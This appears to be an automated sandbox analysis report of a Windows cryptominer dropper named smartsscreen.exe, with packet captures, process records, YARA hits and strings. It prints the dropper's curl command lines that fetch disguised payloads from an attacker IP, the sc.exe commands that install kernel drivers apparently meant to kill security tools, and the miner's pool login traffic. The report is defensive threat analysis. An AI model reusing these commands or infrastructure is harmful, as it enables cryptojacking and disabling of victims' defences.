May 29, 2024 14:25:54.244673014 CEST	1236	IN	Data Raw: 6e e5 0b 08 1e d0 54 45 43 79 dd eb 12 40 03 97 e6 e6 42 81 80 2b 20 ce f0 67 46 23 27 9a 84 f7 5c d7 35 94 66 94 82 39 13 fd 29 d8 0f 9e 6a 7f 4d 01 59 e0 c3 6a 7f 05 27 b0 81 5d fd f2 75 b7 1b 64 fd 59 48 ba ac d9 76 2b 3f 7b 6f 22 3f 28 2d 28 Data Ascii: nTECy@B+ gF#'\5f9)jMYj']udYHv+?{o"?(-(5(= qJdpeErn!RTnR4Id?b#E}R-Eo)n"E9RS?#E^?iQJ*Jq7\J[/rU]^e18lkQb0G,E~Hi>q{Y
May 29, 2024 14:25:54.244707108 CEST	1236	IN	Data Raw: 79 e5 ea f0 08 22 57 2f 0f f5 97 ab eb 77 fa d3 b6 f9 4e 7f b9 9a 78 67 b7 72 95 0b 7e d0 24 85 b8 5f ce d5 7e b3 92 ee 95 77 f2 ac 13 d0 15 40 51 c3 30 df 23 65 af 41 38 5e a8 02 51 d3 39 32 d5 60 ba 8a 81 68 a5 20 57 cd 28 63 78 ac c6 63 b7 50 Data Ascii: y"W/wNxgr~$_~w@Q0#eA8^Q92`h W(cxcPt%xwFyaCDrboPLA\G1;SDJ?A<N<rBv9A5FdNdYN05PLInZQNAW83_,o8/]kOb`\|s
May 29, 2024 14:25:54.244740009 CEST	1236	IN	Data Raw: e4 b4 07 2b e5 f6 50 30 8b 64 18 c7 88 bb 09 ca 71 9d 50 3d f2 1f 71 9e 15 8f 16 ff 47 9c 67 e5 84 fd 8e ec 08 0c 83 bb 4c af c5 c9 df 66 81 1f 2e ba 74 26 ed 01 b6 3e 03 4f 29 3a 0d e0 5c 70 eb f7 e0 c9 69 70 1a 1c c5 2a b8 d6 3a aa 62 5c 8b fb Data Ascii: +P0dqP=qGgLf.t&>O):\pip*:b\}Sw;NG~L~klrRGZvA>=h8Bd<lO_q?={e~nVQn5\n_[; 8xkd$g2Xl=U)IpB
May 29, 2024 14:25:54.244774103 CEST	1236	IN	Data Raw: 61 93 5d 7d 2e b9 dd a8 51 ed ca e4 33 02 d4 37 c1 57 aa 1e 62 7e 35 ba 14 71 da c6 9a 70 c9 e8 f6 e0 ed 43 f0 c0 a1 54 68 44 e5 0c 06 58 84 de ce 0c 09 ca 71 5d 07 52 4f 38 12 ff ae d1 19 3d 1d cf 92 1f e6 7b 72 b5 57 d1 3b ab 54 e8 76 93 03 96 Data Ascii: a]}.Q37Wb~5qpCThDXq]RO8={rW;Tv4=9Jw&r{@W<uh.x5+%Q~qrV}TdI;-<P>Po$C,8&[;JQ~>.ii$_h
May 29, 2024 14:25:54.244806051 CEST	1236	IN	Data Raw: 5b 18 f4 ed 32 d4 20 26 ef bb 3e 0b 26 bb b1 17 06 8b db bc 59 02 d0 17 30 e2 3c e7 05 e8 34 e1 a4 6f 05 d3 b3 68 c2 61 11 d5 23 83 7d 5b b3 eb 7d 5b b3 f6 c1 9e d3 64 f6 18 df f1 a9 3d 90 4b b7 4a 2e c1 b3 b8 01 fb cc 60 cf c9 6c b6 fe 38 d3 75 Data Ascii: [2 &>&Y0<4oha#}[}[d=KJ.`l8u"NIwTn}Q\|;_VGezUy2\|Y:t=z/cd;u c{US;ayde"'dT_5l$!H^8\|/0[*WGC8\|g
May 29, 2024 14:25:54.244842052 CEST	1236	IN	Data Raw: 0c 34 29 48 dc bf a6 2b 35 3e cf 10 8f e9 92 bd e6 6f 48 fd 1a 03 02 46 0f 10 4d 8a 31 91 dd 74 5c 30 45 9f 91 6e 32 35 f7 41 25 aa 61 53 e7 a8 cd ce 49 12 f6 ad 46 d6 b0 f7 be 56 4f 33 b7 f2 60 ac b8 fe 27 06 61 13 e0 b9 5d fa a6 e4 3e 5c d4 ab Data Ascii: 4)H+5>oHFM1t\0En25A%aSIFVO3`'a]>\=XOFa=7rym"~$$y+N4;. v-=uOko4#N.TYh}eY8]ghOA {Z,9GOn>dWYs5
May 29, 2024 14:25:54.250332117 CEST	1236	IN	Data Raw: 57 5a 8e 74 5d 48 64 b9 6b 0d 3b f4 86 d4 be 59 0f f8 54 41 da 5b bb e5 ca ac ca 3c b3 75 71 49 19 08 49 36 25 6d 67 0e cf aa d4 db 2b 4a 4b 0a a1 7c ca 82 bb 40 06 c6 a8 c4 7a 46 3d d0 df 38 2a c5 3e c2 bf 81 9a 31 40 ff 88 7f 19 e0 3e 87 51 33 Data Ascii: WZt]Hdk;YTA[<uqII6%mg+JK\|@zF=8*>1@>Q39@,xED+H~0&Lfp-HF=D-g~L1z1}XL~1=%CLibj5bnb^h:@LGirb'1Mb]L =b:^Li

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49768	111.90.143.130	80	3616	C:\Users\user\Desktop\taskhostw.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:54.104404926 CEST	512	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 78 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half
May 29, 2024 14:25:55.083285093 CEST	703	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 31 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 62 61 64 39 39 61 65 39 66 31 33 61 35 38 36 63 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f Data Ascii: {"jsonrpc":"2.0","id":1,"error":null,"result":{"id":"bad99ae9f13a586c","job":{"blob":"0303b9bddcb206a59895f22a686aaf4608b18ab82fc1425e38aca30c4d0a722b52053aae7c19a10000000620f0af540b030000b0c29eb6430300001007508f45000000b0f5eadd40000000707bb4e
May 29, 2024 14:26:56.725522995 CEST	82	OUT	Data Raw: 7b 22 69 64 22 3a 33 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6b 65 65 70 61 6c 69 76 65 64 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 62 61 64 39 39 61 65 39 66 31 33 61 35 38 36 63 22 7d 7d 0a Data Ascii: {"id":3,"jsonrpc":"2.0","method":"keepalived","params":{"id":"bad99ae9f13a586c"}}
May 29, 2024 14:26:57.108900070 CEST	71	IN	Data Raw: 7b 22 69 64 22 3a 33 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4b 45 45 50 41 4c 49 56 45 44 22 7d 7d 0a Data Ascii: {"id":3,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}
May 29, 2024 14:27:57.325613022 CEST	82	OUT	Data Raw: 7b 22 69 64 22 3a 34 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6b 65 65 70 61 6c 69 76 65 64 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 62 61 64 39 39 61 65 39 66 31 33 61 35 38 36 63 22 7d 7d 0a Data Ascii: {"id":4,"jsonrpc":"2.0","method":"keepalived","params":{"id":"bad99ae9f13a586c"}}
May 29, 2024 14:27:57.712769985 CEST	71	IN	Data Raw: 7b 22 69 64 22 3a 34 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4b 45 45 50 41 4c 49 56 45 44 22 7d 7d 0a Data Ascii: {"id":4,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}
May 29, 2024 14:28:58.638942003 CEST	82	OUT	Data Raw: 7b 22 69 64 22 3a 35 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6b 65 65 70 61 6c 69 76 65 64 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 62 61 64 39 39 61 65 39 66 31 33 61 35 38 36 63 22 7d 7d 0a Data Ascii: {"id":5,"jsonrpc":"2.0","method":"keepalived","params":{"id":"bad99ae9f13a586c"}}
May 29, 2024 14:28:59.022880077 CEST	71	IN	Data Raw: 7b 22 69 64 22 3a 35 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4b 45 45 50 41 4c 49 56 45 44 22 7d 7d 0a Data Ascii: {"id":5,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49742	1.1.1.1	443	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-29 12:25:13 UTC	277	OUT	GET /dns-query?name=download.yrnvtklot.com&type=A HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 Accept: application/dns-json Accept-Encoding: gzip Connection: close
2024-05-29 12:25:14 UTC	214	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 29 May 2024 12:25:14 GMT Content-Type: application/dns-json Connection: close Access-Control-Allow-Origin: * Content-Length: 208 CF-RAY: 88b677464b094346-EWR
2024-05-29 12:25:14 UTC	208	IN	Data Raw: 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 64 6f 77 6e 6c 6f 61 64 2e 79 72 6e 76 74 6b 6c 6f 74 2e 63 6f 6d 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 64 6f 77 6e 6c 6f 61 64 2e 79 72 6e 76 74 6b 6c 6f 74 2e 63 6f 6d 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 39 30 30 2c 22 64 61 74 61 22 3a 22 31 31 31 2e 39 30 2e 31 35 38 2e 34 30 22 7d 5d 7d Data Ascii: {"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"download.yrnvtklot.com","type":1}],"Answer":[{"name":"download.yrnvtklot.com","type":1,"TTL":900,"data":"111.90.158.40"}]}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49743	1.1.1.1	443	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-29 12:25:14 UTC	275	OUT	GET /dns-query?name=online.yrnvtklot.com&type=A HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 Accept: application/dns-json Accept-Encoding: gzip Connection: close
2024-05-29 12:25:14 UTC	214	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 29 May 2024 12:25:14 GMT Content-Type: application/dns-json Connection: close Access-Control-Allow-Origin: * Content-Length: 204 CF-RAY: 88b6774b4b4b41ed-EWR
2024-05-29 12:25:14 UTC	204	IN	Data Raw: 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6f 6e 6c 69 6e 65 2e 79 72 6e 76 74 6b 6c 6f 74 2e 63 6f 6d 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6f 6e 6c 69 6e 65 2e 79 72 6e 76 74 6b 6c 6f 74 2e 63 6f 6d 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 39 30 30 2c 22 64 61 74 61 22 3a 22 31 31 31 2e 39 30 2e 31 35 38 2e 34 30 22 7d 5d 7d Data Ascii: {"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"online.yrnvtklot.com","type":1}],"Answer":[{"name":"online.yrnvtklot.com","type":1,"TTL":900,"data":"111.90.158.40"}]}

Target ID:	0
Start time:	08:25:09
Start date:	29/05/2024
Path:	C:\Users\user\Desktop\smartsscreen.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\smartsscreen.exe"
Imagebase:	0x400000
File size:	4'378'624 bytes
MD5 hash:	18957D83337A7F6A879D739BE02B173E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	08:25:21
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\expand.exe C:\Users\user\Desktop\curl.png C:\Users\user\Desktop\curl.exe
Imagebase:	0x290000
File size:	53'248 bytes
MD5 hash:	544B0DBFF3F393BCE8BB9D815F532D51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:25:21
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:25:23
Start date:	29/05/2024
Path:	C:\Users\user\Desktop\curl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/taskhostw.png?t=1716985523 -o C:\Users\user\Desktop\taskhostw.png --connect-timeout 30 --retry 10
Imagebase:	0x400000
File size:	490'496 bytes
MD5 hash:	69CAC8A16EB9FDCDB1A1617842FD8DD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:25:23
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:25:30
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\expand.exe C:\Users\user\Desktop\taskhostw.png C:\Users\user\Desktop\taskhostw.exe
Imagebase:	0x290000
File size:	53'248 bytes
MD5 hash:	544B0DBFF3F393BCE8BB9D815F532D51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1955241453.0000000002C9B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:25:30
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:25:32
Start date:	29/05/2024
Path:	C:\Users\user\Desktop\curl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/config.json?t=1716985532 -o C:\Users\user\Desktop\config.json --connect-timeout 30 --retry 10
Imagebase:	0x400000
File size:	490'496 bytes
MD5 hash:	69CAC8A16EB9FDCDB1A1617842FD8DD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:25:32
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:25:34
Start date:	29/05/2024
Path:	C:\Users\user\Desktop\curl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/WinRing0x64.png?t=1716985534 -o C:\Users\user\Desktop\WinRing0x64.png --connect-timeout 30 --retry 10
Imagebase:	0x400000
File size:	490'496 bytes
MD5 hash:	69CAC8A16EB9FDCDB1A1617842FD8DD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:25:35
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:25:38
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\expand.exe C:\Users\user\Desktop\WinRing0x64.png C:\Users\user\Desktop\WinRing0x64.sys
Imagebase:	0x290000
File size:	53'248 bytes
MD5 hash:	544B0DBFF3F393BCE8BB9D815F532D51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:25:38
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:25:40
Start date:	29/05/2024
Path:	C:\Users\user\Desktop\taskhostw.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\taskhostw.exe
Imagebase:	0x140000000
File size:	5'617'152 bytes
MD5 hash:	BD877072C51EE58EC7AAF091BFF0B80C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000013.00000000.2054060746.00000001407F6000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	08:25:40
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	08:25:46
Start date:	29/05/2024
Path:	C:\Users\user\Desktop\curl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/drives/kill.png?t=1716985546 -o C:\Windows\Sysnative\drivers\aswArPots.png --connect-timeout 30 --retry 10
Imagebase:	0x400000
File size:	490'496 bytes
MD5 hash:	69CAC8A16EB9FDCDB1A1617842FD8DD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	08:25:47
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:25:50
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\expand.exe C:\Windows\Sysnative\drivers\aswArPots.png C:\Windows\Sysnative\drivers\aswArPots.sys
Imagebase:	0x290000
File size:	53'248 bytes
MD5 hash:	544B0DBFF3F393BCE8BB9D815F532D51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:25:50
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:25:51
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto
Imagebase:	0x3e0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:25:51
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	08:25:51
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\sc.exe start aswArPots
Imagebase:	0x3e0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	08:25:51
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	08:25:52
Start date:	29/05/2024
Path:	C:\Users\user\Desktop\curl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/drives/delete.png?t=1716985552 -o C:\Windows\Sysnative\drivers\IObitUnlockers.png --connect-timeout 30 --retry 10
Imagebase:	0x400000
File size:	490'496 bytes
MD5 hash:	69CAC8A16EB9FDCDB1A1617842FD8DD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	08:25:52
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	08:25:56
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\expand.exe C:\Windows\Sysnative\drivers\IObitUnlockers.png C:\Windows\Sysnative\drivers\IObitUnlockers.sys
Imagebase:	0x290000
File size:	53'248 bytes
MD5 hash:	544B0DBFF3F393BCE8BB9D815F532D51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	08:25:56
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	08:25:58
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\sc.exe create IObitUnlockers binPath= C:\Windows\System32\drivers\IObitUnlockers.sys type= kernel start= auto
Imagebase:	0x3e0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	08:25:58
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	08:25:59
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\sc.exe start IObitUnlockers
Imagebase:	0x3e0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	08:25:59
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.2%
Total number of Nodes:	717
Total number of Limit Nodes:	36

Executed Functions

Function 00407670 Relevance: 514.6, APIs: 100, Strings: 192, Instructions: 3647COMMON

Download Yara Rule

Strings

CURLOPT_HTTPPROXYTUNNEL, xrefs: 004089A0
gF, xrefs: 00409CCC
CURLOPT_COOKIE, xrefs: 00409665
proxy, xrefs: 004078F9
Keep-alive functionality somewhat crippled due to missing support in your operating system!, xrefs: 0040AC9E
